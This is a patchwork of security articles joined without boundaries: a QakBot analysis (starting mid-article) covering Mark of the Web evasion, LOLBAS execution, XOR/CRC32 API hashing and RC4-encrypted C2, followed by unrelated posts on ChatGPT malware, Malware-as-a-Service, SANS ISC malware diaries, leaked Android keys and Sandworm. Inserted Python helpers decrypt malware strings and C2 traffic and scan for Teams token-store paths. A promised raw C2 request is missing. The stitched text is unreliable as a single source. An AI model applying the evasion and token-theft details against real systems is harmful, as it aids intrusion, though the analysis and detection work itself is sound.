Figure 3 – Macros blocked on downloaded Excel document

When a Windows user downloads a file from the internet, Windows creates an Alternate Data Stream (ADS) named Zone.Identifier and records a ZoneId in this ADS to indicate the zone from which the file originates. This is a proactive security feature intended to prevent malicious files downloaded from untrusted sources from running. Many Windows security features such as Microsoft Office Protected View, SmartScreen, Smart App Control, and warning dialogs rely on the presence of the MoTW to function correctly.

Figure 4 shows the details of the MoTW alternate data stream on a file downloaded from VirusTotal, with the ZoneId used to identify the file’s origin. The following ZoneId values may be used in a Zone.Identifier ADS:

Local computer
Local intranet
Trusted sites
Internet
Restricted sites


Figure 4 – Extracting ZoneID ADS on downloaded file
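The Zone.Identifier stream is a small INI-style text block, so a defender can parse it and decide whether a file carries a mark Windows treats as untrusted. The Python below is an added example, not EclecticIQ's code or a Windows API: it parses the `[ZoneTransfer]` section, maps the ZoneId to the zone names listed above (the numeric values 0 to 4 are the standard URL security zone ids), and reports whether the file falls in the Internet or Restricted sites zone. The stream text is constructed; `read_zone_identifier` shows how the stream is opened on NTFS and returns None when there is no stream at all, which is the case worth checking for a loader that arrived inside a mounted ISO rather than as a direct download.

```python
from typing import Optional

# URL security zone ids as Windows writes them in the ZoneTransfer section.
ZONE_NAMES = {
    0: "Local computer",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}
# Zones that SmartScreen and Office Protected View treat as untrusted.
UNTRUSTED_ZONES = {3, 4}

# Constructed Zone.Identifier stream contents, in the INI layout Windows uses.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/download\r\n"
    "HostUrl=https://example.invalid/files/sample.zip\r\n"
)


def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style stream into a dict of keys found under [ZoneTransfer]."""
    fields = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "zonetransfer"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def classify(text: Optional[str]) -> dict:
    """Decide whether a file carries a mark that Windows treats as untrusted."""
    if text is None:
        return {"zone_id": None, "zone": "no Zone.Identifier stream",
                "untrusted": False, "host_url": None}
    fields = parse_zone_identifier(text)
    try:
        zone_id = int(fields.get("ZoneId", ""))
    except ValueError:
        zone_id = None
    return {
        "zone_id": zone_id,
        "zone": ZONE_NAMES.get(zone_id, "unknown"),
        "untrusted": zone_id in UNTRUSTED_ZONES,
        "host_url": fields.get("HostUrl"),
    }


def read_zone_identifier(path: str) -> Optional[str]:
    """Read the ADS on NTFS (Windows); None means the file carries no mark."""
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:
        return None


if __name__ == "__main__":
    print(classify(SAMPLE_STREAM))
    print(classify(None))
```

A file with no stream is not "trusted" in any positive sense; it simply never received a mark, so none of the MoTW-dependent checks fire. That is why the classifier reports the missing stream separately instead of folding it into the untrusted flag.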

QakBot Campaign Observed Evading Windows Mark of the Web (MoTW)

At the beginning of November 2022, EclecticIQ analysts examined a recent campaign that delivers QakBot (also called Qbot) to victim devices via phishing emails, executes it by abusing multiple Living Off the Land Binaries and Scripts (LOLBAS), and evades the Mark of the Web (MoTW) flag to increase the infection rate. QakBot has been observed as an initial access point for ransomware groups (4).

Threat actors have used QakBot since 2007 (5) as a banking Trojan to steal credit card information from victim devices. It has since evolved into initial access malware for remotely delivering additional malicious payloads. The Black Basta ransomware gang used QakBot to gain initial access to a victim’s device and move laterally within the organization’s network before executing ransomware at the end of the kill chain.

QakBot’s execution process is highlighted below:


Figure 5 – QakBot Execution Flow

First Stage: Phishing Emails Containing Malicious URLs Deliver Qakbot Loader

The attack starts with a phishing email containing a malicious URL and the ZIP password used to deliver the QakBot malware. Victims clicking on the URL download an encrypted ZIP archive which can be unzipped with the password provided by the attackers in the phishing email. The unzipped archive contains a randomly named malicious ISO image. The ISO image contains the final QakBot loader in the form of a JavaScript file (WW.js), which is used to execute the QakBot DLL in the memory of wermgr.exe (a Windows error reporting process).

Figure 6 – Example of a phishing email delivering QakBot malware

Second Stage 2.1: In-Memory Execution of QakBot Malware via JavaScript Loader

The QakBot loader is executed by one of the most widely abused Living Off the Land Binaries and Scripts (LOLBAS), wscript.exe (3). Threat actors often abuse Windows built-in features to avoid detection. On Windows, a file with a JavaScript extension can be executed by a user click; on execution it is run by the built-in script host wscript.exe (3).

Figure 7 – QakBot loader inside the mounted ISO image.

The QakBot loader invokes the Regsvr32.exe (2) command-line tool, stored as an obfuscated string to evade antivirus detection. When a user clicks on WW.js, it uses Regsvr32.exe (2) to load the QakBot DLL, which is located under the port directory and is named resemblance.tmp.

Figure 8 – QakBot loader with malformed digital signature.

Figure 9 – resemblance.tmp contains the MZ magic header, which marks it as an executable.

Figure 10 – Extracted malformed digital signature from the JavaScript QakBot loader

Second Stage 2.2: QakBot Loader uses Malformed Digital Signature to Evade Mark of the Web (MoTW)

On November 3rd, researcher Will Dormann (6) identified three different methods for bypassing the MoTW feature. On November 8th, Microsoft released patches (CVE-2022-41049, CVE-2022-41091) (7) addressing two of the methods. The third method, using malformed digital signatures (CVE-2022-44698) (8), was patched on December 13 and was actively exploited in the wild.

Normally, after executing the QakBot loader, Windows displays a warning message (see Figure 11) to prevent the execution. Because of the malformed digital signature, the loader bypasses the Mark of the Web (MoTW) check, and execution proceeds without a Windows warning pop-up.

Figure 11 – Mark of the Web (MoTW) in action

Figure 12 – Downloaded JavaScript file from an untrusted URL automatically flagged by MoTW.

Third Stage: QakBot Uses Multiple Techniques to Evade Anti-Malware Scanners

In the next stage of the attack, QakBot injects itself into the legitimate Windows Error Reporting process (wermgr.exe) to evade behavior-based anti-malware solutions.

Figure 13 – Injected QakBot DLL

More information about the Living Off the Land Binaries Regsvr32.exe and WScript.exe can be found via the links below.

Regsvr32.exe (2)
WScript.exe (3)


Figure 14 – Process injection on wermgr.exe and LOLBAS observed in process tree.

QakBot uses Windows API hashing (dynamic API resolution) to evade signature-based anti-malware scanners. It hides the contents of its import address table by hashing API names with CRC32 and XOR-encrypting the resulting hashes.

The pictures below show the decompiled functions used to perform API hashing:

Figure 15 – XOR-encrypted API hashing.

EclecticIQ analysts extracted the XOR key which is used to decrypt the content of APIs during the execution time and used this key to decrypt other APIs for further analysis.

Figure 16 – XOR encryption key stored as a static value to decrypt the API hash.

QakBot also uses the XOR encryption algorithm to hide its strings and minimize AV detection. Figure 10 shows the encrypted strings stored in the .rdata section; they are decrypted at run time.

Figure 17 – XOR-encrypted strings hidden inside the .rdata section

EclecticIQ analysts successfully decrypted the XOR-encrypted strings used by QakBot. The decrypted strings are used by QakBot to test the internet connection of the victim device, perform a sandbox check, gain persistence on the victim device by abusing Scheduled Tasks, and gather victim computer information at the attacker’s request through a command-and-control (C2) server.

Figure 18 – Decrypted strings from QakBot malware
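Both obfuscation layers described above (CRC32 API hashes XOR-encrypted with a static key in Figures 15 and 16, and XOR-encrypted strings in the .rdata section in Figures 17 and 18) are undone the same way once the key is recovered: hash every candidate export name with the same scheme and look the stored values up, and XOR the string table back with the recovered key. The Python below is an added analyst helper, not EclecticIQ's or QakBot's code. It assumes a scheme of `crc32(name) ^ key`; the real QakBot key, byte order and any extra transformations are not given on the page, so `ASSUMED_XOR_KEY`, `STRING_KEY`, the candidate API list and the sample string table are all constructed for the example.

```python
import zlib

# Assumed scheme for this example: stored_hash = crc32(api_name) ^ key.
# The real QakBot constants and hash layout are not given on the page.
ASSUMED_XOR_KEY = 0x5A3C9F21

# Constructed candidate export names an analyst would hash when resolving an IAT.
CANDIDATE_APIS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateRemoteThread", "WriteProcessMemory", "OpenProcess", "ExitProcess",
]


def hash_api(name: str, key: int) -> int:
    """CRC32 of the ASCII name, XOR-encrypted with the key, as a 32-bit value."""
    return (zlib.crc32(name.encode("ascii")) ^ key) & 0xFFFFFFFF


def resolve_api_hashes(stored: list, key: int, candidates: list) -> list:
    """Map stored hashes back to names by hashing every candidate; None when unknown."""
    lookup = {hash_api(n, key): n for n in candidates}
    return [lookup.get(h & 0xFFFFFFFF) for h in stored]


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decrypt_string_table(blob: bytes, key: bytes) -> list:
    """Decrypt a NUL-separated string table and return the printable ASCII strings."""
    plain = xor_bytes(blob, key)
    out = []
    for chunk in plain.split(b"\x00"):
        if chunk and all(32 <= c < 127 for c in chunk):
            out.append(chunk.decode("ascii"))
    return out


# Constructed sample: a string table of the kind Figure 18 shows, encrypted here
# with a constructed key so the example is self-contained.
STRING_KEY = b"example-key-not-qakbot"
SAMPLE_STRINGS = b"www.example.invalid\x00schtasks\x00Win32_ComputerSystem\x00"
SAMPLE_ENCRYPTED = xor_bytes(SAMPLE_STRINGS, STRING_KEY)


if __name__ == "__main__":
    stored = [hash_api("VirtualAlloc", ASSUMED_XOR_KEY),
              hash_api("OpenProcess", ASSUMED_XOR_KEY)]
    print(resolve_api_hashes(stored, ASSUMED_XOR_KEY, CANDIDATE_APIS))
    print(decrypt_string_table(SAMPLE_ENCRYPTED, STRING_KEY))
```

The printable-ASCII filter in `decrypt_string_table` doubles as a sanity check on the key: a wrong key produces almost no chunks that survive it, which is a quick way to confirm a key pulled from a decompiled function such as the one in Figure 16.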

Fourth Stage: Command and Control (C2) Connection

After successful execution, QakBot checks its internet connectivity and will send multiple POST requests to its C2 servers.

QakBot checks internet availability on victim’s device:

Figure 19 – QakBot malware checking internet availability

The C2 protocol encapsulates messages in a JSON object; the message is RC4-encrypted and then Base64-encoded.

Figure 20 – QakBot performs command and control connections
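The encapsulation just described (a JSON object, RC4-encrypted, then Base64-encoded) is what an analyst has to reverse to read a captured POST body once the RC4 key has been recovered from the sample. The Python below is an added example, not EclecticIQ's tooling or QakBot's own code: it implements textbook RC4, wraps and unwraps a JSON message in that layering, and returns None when the key is wrong or the decrypted bytes are not a JSON object. `EXAMPLE_KEY` and the beacon field names are constructed for the example; the real key and message schema are not on the page, and whether the JSON sits outside or inside the RC4 layer is this example's reading of the report.

```python
import base64
import json
from typing import Optional

# Constructed key for the example; the real C2 key is not on the page.
EXAMPLE_KEY = b"constructed-rc4-key"


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encapsulate(message: dict, key: bytes) -> str:
    """JSON -> RC4 -> Base64, the layering the report describes."""
    raw = json.dumps(message, separators=(",", ":")).encode("utf-8")
    return base64.b64encode(rc4(key, raw)).decode("ascii")


def decapsulate(blob: str, key: bytes) -> Optional[dict]:
    """Reverse the layering; None when the key is wrong or the body is not a JSON object."""
    try:
        plain = rc4(key, base64.b64decode(blob, validate=True))
        obj = json.loads(plain.decode("utf-8"))
    except ValueError:  # binascii.Error, UnicodeDecodeError and JSONDecodeError all derive from it
        return None
    return obj if isinstance(obj, dict) else None


# Constructed beacon-style content; the field names are invented for this example.
SAMPLE_BEACON = {"type": "checkin", "host": "WIN-ANALYSIS", "user": "analyst", "pid": 4242}
SAMPLE_POST_BODY = encapsulate(SAMPLE_BEACON, EXAMPLE_KEY)


if __name__ == "__main__":
    print(SAMPLE_POST_BODY)
    print(decapsulate(SAMPLE_POST_BODY, EXAMPLE_KEY))
    print(decapsulate(SAMPLE_POST_BODY, b"wrong-key"))
```

Because RC4 has no integrity check, a wrong key does not fail loudly; it yields noise that usually fails UTF-8 or JSON parsing, which is what `decapsulate` relies on. When triaging captured traffic, the Base64 body parsing succeeding while JSON parsing fails is a strong hint that the key, not the layering, is wrong.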

Raw example of an HTTP POST request sent by QakBot to its C2:


MITRE ATT&CK

TTP ID      Technique Name
T1204.001   User Execution: Malicious Link
T1218.010   System Binary Proxy Execution: Regsvr32
T1059.007   Command and Scripting Interpreter: JavaScript
T1566.002   Phishing: Spearphishing Link
T1071.001   Application Layer Protocol: Web Protocols
T1055.012   Process Injection: Process Hollowing
T1027       Obfuscated Files or Information
T1027.007   Obfuscated Files or Information: Dynamic API Resolution
T1082       System Information Discovery
T1053.005   Scheduled Task/Job: Scheduled Task
T1497.001   Virtualization/Sandbox Evasion: System Checks
T1047       Windows Management Instrumentation

Indicators:

File Name              SHA-256 Hash
resemblance.tmp        8ca16991684f7384c12b6622b8d1bcd23bc27f186f499c2059770ddd3031f274
UY76.img               26f5bc698dfec8e771b781dc19941e2d657eb87fe8669e1f75d9e5a1bb4db1db
WW.js                  c5df8f8328103380943d8ead5345ca9fe8a9d495634db53cf9ea3266e353a3b1
Injected-QakBot-dll    6fb41b33304b65e6e35f04e8cc70f7a24cd36e29bbb97266de68afcf113f9a5f

 


About EclecticIQ Intelligence & Research Team

EclecticIQ is a global provider of threat intelligence, hunting, and response technology and services. Headquartered in Amsterdam, the EclecticIQ Intelligence & Research Team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.

We would love to hear from you. Please send us your feedback by emailing us at research@eclecticiq.com or fill in the EclecticIQ Audience Interest Survey to drive our research towards your priority area.

Structured Data

Find the Analyst Prompt and earlier editions in our public TAXII collection for easy use in your security stack.

TAXII v1 Discovery services: https://cti.eclecticiq.com/taxii/discovery

Please refer to our support page for guidance on how to access the feeds.


Appendix

(1) Magniber Ransomware Attempts to Bypass MOTW (Mark of the Web)
(2) https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
(3) https://lolbas-project.github.io/lolbas/Binaries/Wscript/
(4) https://www.darkreading.com/threat-intelligence/black-basta-gang-deploys-qakbot-malware-cyber-campaign
(5) https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot
(6) Will Dormann on Twitter:

So to summarize, we've got 3 different MotW bypasses:
1) "Special" ZIP contents – Works on all versions of Windows
2) Corrupt Authenticode – Works on all Windows versions prior to Win11 22H2
3) Just open from ZIP directly – Works on Win11 22H2
Take your pick. Or hedge your bets!

— Will Dormann (@wdormann) November 3, 2022

(7) https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41091
(8) https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-44698
(9) https://www.bleepingcomputer.com/news/security/new-attacks-use-windows-security-bypass-zero-day-to-drop-malware/
(10) https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/

I don’t know how much of a thing this will end up being, but we are seeing ChatGPT-written malware in the wild.

…within a few weeks of ChatGPT going live, participants in cybercrime forums—­some with little or no coding experience­—were using it to write software and emails that could be used for espionage, ransomware, malicious spam, and other malicious tasks.

“It’s still too early to decide whether or not ChatGPT capabilities will become the new favorite tool for participants in the Dark Web,” company researchers wrote. “However, the cybercriminal community has already shown significant interest and are jumping into this latest trend to generate malicious code.”

Last month, one forum participant posted what they claimed was the first script they had written and credited the AI chatbot with providing a “nice [helping] hand to finish the script with a nice scope.”

The Python code combined various cryptographic functions, including code signing, encryption, and decryption. One part of the script generated a key using elliptic curve cryptography and the curve ed25519 for signing files. Another part used a hard-coded password to encrypt system files using the Blowfish and Twofish algorithms. A third used RSA keys and digital signatures, message signing, and the blake2 hash function to compare various files.

Check Point Research report.

ChatGPT-generated code isn’t that good, but it’s a start. And the technology will only get better. Where it matters here is that it gives less skilled hackers—script kiddies—new capabilities.


The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article. 

With the explosive growth of technology, businesses are more vulnerable than ever to malicious cyber attacks. And as cybercriminals become more sophisticated, new methods of attack are popping up left and right.

To add fuel to the fire, the average cost of a data breach increased from $3.86 million to $4.24 million in 2021. That’s costly enough to put most SMBs into the red. Not to mention the reputational damage it can cause for your brand.

Avoid this dreaded fate by protecting yourself against the latest cybersecurity developments — like Malware-as-a-Service (MaaS) — to protect your networks, data, systems, and business reputation.

If you’ve never heard of Malware-as-a-Service (MaaS) before, don’t fret. This article is for you.

We’ll teach you everything you need to know about Malware-as-a-Service and wrap it up by sharing some best practices for protecting your proprietary company data from potential threats.

Let’s dive in.

What is Malware-as-a-Service (MaaS)?

Malware-as-a-Service (MaaS) is a type of cyber attack in which criminals offer malware and deployment services to other hackers or malicious actors on the internet.

These services typically are available on the dark web. When purchased, a bad actor can carry out various malicious activities, such as stealing sensitive information, disrupting computer systems, or encrypting data and demanding a ransom to unlock it.

Some of the most common types of malware include the following:

Viruses: Programs that can replicate themselves and spread to other computers. They can cause various problems, such as disrupting computer operations, stealing information, or damaging files.
Trojan horses: Programs that masquerade as legitimate software but can carry out malicious activities, such as stealing data or giving attackers unauthorized access to a computer.
Worms: A self-replicating program that can spread across networks, disrupting computer operations and consuming network resources.
Adware: Software that displays unwanted advertisements on a computer. It can be intrusive and annoying and sometimes track a user’s online activities.
Ransomware: Encryption of a victim’s data with the demand for a ransom payment to unlock it. It can devastate businesses, resulting in losing important data and files.
Spyware: Software designed to collect information about a user’s online activities without their knowledge or consent to steal sensitive information (like financial statements and passwords).
Bots: Often used in conjunction with other types of malware, such as viruses or worms. For example, a virus could infect a computer and then download and install a bot, which could carry out malicious activities on that computer or other computers on the network.

MaaS makes it easier for cybercriminals to launch attacks, as they can purchase and use pre-made malware without developing it themselves. This distinction can make it harder for law enforcement, cybersecurity experts, and IT teams to track down the people responsible for the attacks.

And sadly, cyber-attacks are industry agnostic. For example, in the transportation industry, cybercriminals exploit vulnerabilities of electronic logging devices and steal valuable information from cloud-connected trucks.

MaaS is also a significant threat to online job boards like Salarship, Indeed, UpWork, or any other platform where job applications are stored. Attackers can easily access the personal data of thousands or millions of people by targeting these sites.

The bottom line: as a business holding proprietary company data, it’s essential to be aware of the different types of malware and to take the necessary precautionary steps to protect against these heinous services.

Ransomware-as-a-Service (RaaS) vs. Malware-as-a-Service (MaaS)

Ransomware falls under the umbrella of malware. But what’s the difference between Ransomware-as-a-Service (RaaS) and Malware-as-a-Service (MaaS)?

The main difference between MaaS and RaaS is the specific type of malware offered as a service. MaaS involves the development and deployment of any malware, while RaaS specifically consists of the development and deployment of ransomware.

Ransomware is a type of malware that restricts access to the infected computer system or its data and demands a ransom payment to regain access. It typically spreads through phishing emails, malicious websites, and targeted exploits.

MaaS and RaaS are online services on the dark web that make it easy for anyone with no experience or knowledge to launch an attack.

In some RaaS cases, the attackers may steal the victim’s data and hold it for ransom, demanding payment to return it to the victim. Or the attackers may encrypt the victim’s data and demand payment to unlock it without stealing it.

Regardless, the goal of ransomware is to make money by extorting the victim.

How to protect your business against MaaS

As malware becomes more sophisticated and accessible, it’s imperative to have defense programs in place that offer your business extra protection against bad actors.

According to a recent study, 64% of Americans would blame the company, not the hacker, for losing personal data.

Thankfully, there are ways to lessen the impact. ​​A report from Cisco states that adhering to General Data Protection Regulations (GDPR) has been shown to minimize the effects of a data breach.

Why? Because if a company complies with the GDPR, attackers might not find any data to exploit. And with the help of a privacy policy generator, your business can be GDPR-compliant with the click of a button.

Here are a few additional steps that your business can take to protect itself from MaaS:

Implement strong network security measures, such as a web application firewall, intrusion detection, and secure passwords.
Regularly update and patch all software and operating systems to fix known vulnerabilities.
Educate employees about Malware-as-a-Service risks and how to avoid them, such as not opening suspicious email attachments or visiting untrusted websites.
Use reputable anti-virus and anti-malware software and regularly scan the network for signs of infection.
Back up any necessary data regularly so your business can quickly restore its operations if anything goes south.

One of your company’s most significant assets is its data privacy and reputation, which directly affects how much your business is worth. So it’s critical to protect it against MaaS with a strong and well-implemented cybersecurity plan.

Wrapping up

Cybercriminals no longer need a strong technical background to pull off a malicious hack. The MaaS model has made it possible for anyone to become a cybercriminal.

But that doesn’t mean you have to avoid the internet forever — which is pretty challenging to do in today’s day and age.

With preventative measures and a robust cybersecurity strategy, you can sleep soundly at night, knowing your company data is safe from a MaaS attack.

For more advice on staying secure online, check out the AT&T Cybersecurity blog for additional insight.

Yesterday Brad wrote an interesting diary[1] about a piece of malware based on AutoIT. Funny, I was also analyzing a sample that has been written in the same language. I don’t know exactly the source (it was spotted via a hunting rule) but it seems to target the same people (based on the file name). Mine was delivered in a RAR archive called “doc-Impostos_514281.rar” (SHA256:84a35910ad7acb1455695be7aced111356fac9abc818f9ae0859677b07ac0d04). The VT score is very low: 1/61[2].

Got this file attachment this week pretending to be from HSBC Global Payments and Cash Management. The attachment payment_copy.pdf.z is a rar archive, kind of unusual with this type of file archive but when extracted, it comes out as a double extension with pdf.exe. The file is a trojan infostealer and detected by multiple scanning engines. 

Using CyberChef Forensics -> Extract Files, you can view a list of the files embedded in the executable: .exe, .zlib and various mp3 and png files.

Saving some of the files to review and analyze them:

Indicators of Compromise

Filename: payment_copy.pdf.z -> RAR archive data
SHA256: 37da8f89540f4dae114f1f55cfd4d89be9582fbd480ac6ed6c34ac04ec8d576b
SSDEEP: 12288:jiE0YCjbwMh6ny+h+n6SN/PAQDnNNTtcvCEYLPQE5FiER3RiSbhXwS:eE3K0Mh6nyU+6SOQ77lPQaFpbeS

Filename: payment_copy.pdf.exe
IPs: 3.232.242[.]170, 52.20.78[.]240, 54.91.59[.]199, 65.108.213[.]43, 209.197.3[.]8
Domains: api.ipify[.]org, api.ipify.org.herokudns[.]com, mail.reousaomilia[.]gr, reousaomilia[.]gr, www.inkscape[.]org
SHA256: 3ccaf74f465a79ec320fdb7e44ae09551f4348efd3bf8bf7b3638cc0c1cd8492

[1] https://www.virustotal.com/gui/file/37da8f89540f4dae114f1f55cfd4d89be9582fbd480ac6ed6c34ac04ec8d576b
[2] https://www.virustotal.com/gui/file/3ccaf74f465a79ec320fdb7e44ae09551f4348efd3bf8bf7b3638cc0c1cd8492
[3] https://gchq.github.io/CyberChef/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

A bunch of Android OEM signing keys have been leaked or stolen, and they are actively being used to sign malware.

Łukasz Siewierski, a member of Google’s Android Security Team, has a post on the Android Partner Vulnerability Initiative (AVPI) issue tracker detailing leaked platform certificate keys that are actively being used to sign malware. The post is just a list of the keys, but running each one through APKMirror or Google’s VirusTotal site will put names to some of the compromised keys: Samsung, LG, and Mediatek are the heavy hitters on the list of leaked keys, along with some smaller OEMs like Revoview and Szroco, which makes Walmart’s Onn tablets.

This is a huge problem. The whole system of authentication rests on the assumption that signing keys are kept secret by the legitimate signers. Once that assumption is broken, all bets are off:

Samsung’s compromised key is used for everything: Samsung Pay, Bixby, Samsung Account, the phone app, and a million other things you can find on the 101 pages of results for that key. It would be possible to craft a malicious update for any one of these apps, and Android would be happy to install it overtop of the real app. Some of the updates are from today, indicating Samsung has still not changed the key.

Windows 10 supports various virtual drives natively and can recognize and use ISO, VHD and VHDX files. The file included as an attachment with this email, when extracted, appears in the email as a PDF but is in fact a VHD file.

This email, received this week with a zip file attachment, contained after extraction a file with a VHD extension. Using the Linux file command, I identified the file as a Microsoft Disk Image.

Windows 10 File Browser Listing

The file was submitted to Virustotal [1] for analysis with very little detection and was identified as a Trojan by two scan engines. Sandbox analysis also indicated it may try to detect the virtual machine to hinder analysis; analysis by the sandbox was minimal. The sandbox indicated the original filename was 7zS.sfx.exe0 vs 938374740_pdf.vhd.

Attempt to copy the file to Windows 10 Sandbox [2] crashed the system. A second attempt to copy the file resulted with the same outcome.

Indicators

filename: 938374740_pdf.vhd, 7zS.sfx.exe0
SHA256: ea9aca145f23464a7739c7b3b6a8f8c7ce65bdd6f868e0a87a65a9a1291ee960

[1] https://www.virustotal.com/gui/file/ea9aca145f23464a7739c7b3b6a8f8c7ce65bdd6f868e0a87a65a9a1291ee960
[2] https://isc.sans.edu/diary/Malware+Analysis+with+elasticagent+and+Microsoft+Sandbox/27248
Guy Bruneau IPSS Inc.

Malware may be the biggest threat to your organization. If a malware attack is successful, it can result in lost revenue, unexpected down time, stolen data, and more costly consequences. There are multiple kinds of malware, and attackers are continually investing in more complex, harder-to-detect versions. Now is the time to take proactive steps to … 10 Most Common Types of Malware Attacks

Introduction

AutoIt is a scripting language designed for general purpose development. However, like many freeware languages, it has been exploited for malicious intent. Recently Darktrace captured the whole kill-chain of an AutoIt malware compromise, from delivery via email to payload download and subsequent C2.

This week’s email is about Covid, asking all suppliers to declare their vaccination status, but the date is almost a year old.

After saving the attachments, it provided a case sensitive password (W485) to extract the ISO attachment into the file Invoice_10-12_document_9054.iso. To examine the content of the ISO, I mounted it locally on Linux to view and analyze its content.

Mounting the ISO with Linux:
mount -o loop Invoice_10-12_document_9054.iso /mnt

The ISO contains two files that appear interesting; two other files are pictures and two are just random text.

The first file of interest to check out is licentiousness.cmd:

The second file of interest is relaxare.dat. I checked the file with Virustotal and there was no match, then uploaded the file for analysis, with the following results, which matched a banking trojan according to Proofpoint and Snort.

Indicators

104.248.81.57
tracksupernova[.]com
53a933e42832829a18d7608e6b07e3620b4d1c8b8d19226dfecae237041d625c  relaxare.dat

[1] https://www.virustotal.com/gui/file/53a933e42832829a18d7608e6b07e3620b4d1c8b8d19226dfecae237041d625c

Guy Bruneau IPSS Inc.

When you look up a malicious document sample on MalwareBazaar, like this sample, you can see analysis data from olevba and oledump.

Recently, a vulnerability has been disclosed by Vectra that affects Microsoft Teams[1], the very popular communication tool used daily by millions of people (me too). Security researchers found that Teams stores session tokens in clear text on the file system. I won’t discuss the vulnerability here; read the blog post if you want to learn more. The critical element is that once the token has been stolen, an attacker can impersonate the user.

At the end of the blog post, Vectra lists interesting files to watch on the file system. For the Windows operating system, there are:

%AppData%\Microsoft\Teams\Cookies
%AppData%\Microsoft\Teams\Local Storage\leveldb

After reading this, I was curious to see if this is already exploited in the wild. I created a new hunting rule on VT and crossed my fingers. After a few false positives, I got a hit! A DLL was uploaded and contained one of the two strings above.

The file was called “RwWork.dll” (SHA256:5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b). It currently has a VT score of 56/71[2]. The file indeed looks for Teams cookies, and for even more:

As you can see, many files related to cookies are searched. The malware is from the Floxif family…

[1] https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
[2] https://www.virustotal.com/gui/file/5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

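Hunting for the two Teams paths in uploaded binaries is what the VT rule in this diary does. As an added example that is not code from the diary, from Vectra or from VirusTotal, the Python below scans a byte blob for both paths in the two encodings a Windows binary commonly uses, 8-bit and UTF-16LE, because a plain ASCII search misses wide strings. The blob it scans is constructed to stand in for a suspicious DLL's data section.

```python
"""Hunt for hard-coded Microsoft Teams token-store paths inside a binary.

Added example for this diary, not code from the diary or from Vectra.
The two paths are the ones the diary quotes; the sample blob below is
constructed and stands in for a suspicious DLL's data section.
"""
import re

# Paths quoted in the diary (environment variable left unexpanded,
# which is how a stealer usually stores them).
TEAMS_TOKEN_PATHS = [
    r"%AppData%\Microsoft\Teams\Cookies",
    r"%AppData%\Microsoft\Teams\Local Storage\leveldb",
]


def _needles(path: str) -> dict:
    """Encode a path both ways a Windows PE is likely to store it:
    8-bit (ANSI/UTF-8) and UTF-16LE wide strings. An ASCII-only grep
    misses the wide form entirely."""
    return {"ansi": path.encode("ascii"), "utf-16le": path.encode("utf-16-le")}


def find_teams_paths(data: bytes) -> list:
    """Return one hit per (path, encoding, offset). Matching is case-insensitive,
    because Windows path lookups are; re.IGNORECASE on a bytes pattern folds
    ASCII letters only, which is exactly right for both encodings."""
    hits = []
    for path in TEAMS_TOKEN_PATHS:
        for encoding, needle in _needles(path).items():
            pattern = re.compile(re.escape(needle), re.IGNORECASE)
            for match in pattern.finditer(data):
                hits.append({"path": path, "encoding": encoding, "offset": match.start()})
    return hits


def verdict(data: bytes) -> str:
    """Small triage rule: any reference to either token store is worth a closer look."""
    if find_teams_paths(data):
        return "suspicious: references Teams token store"
    return "no Teams paths found"


def build_sample_blob() -> bytes:
    """Constructed stand-in for a DLL's .rdata section: 64 zero bytes, an import
    name, the first path as an 8-bit string, padding, then the second path as a
    lower-case UTF-16LE string (to show both the wide form and case folding)."""
    return (
        b"\x00" * 64
        + b"kernel32.dll\x00"
        + TEAMS_TOKEN_PATHS[0].encode("ascii") + b"\x00"
        + b"\x90" * 16
        + TEAMS_TOKEN_PATHS[1].lower().encode("utf-16-le") + b"\x00\x00"
    )


if __name__ == "__main__":
    blob = build_sample_blob()
    for hit in find_teams_paths(blob):
        print(f"{hit['encoding']:8} @0x{hit['offset']:04x}  {hit['path']}")
    print(verdict(blob))
```

Run against a real sample, the same function would be fed the file's bytes; the hit offsets can then be looked up in the section table to see whether the strings live in read-only data or were decrypted into a writable section at runtime.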
Russia-linked APT group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware.

Multiple security firms have reported that the Sandworm APT continues to target Ukraine by multiple means, including custom malware and botnets like Cyclops Blink.

Sandworm (aka BlackEnergy and TeleBots) has been active since 2000; it operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST).

The group is also the author of the NotPetya ransomware that hit hundreds of companies worldwide in June 2017, causing billions of dollars in damage.

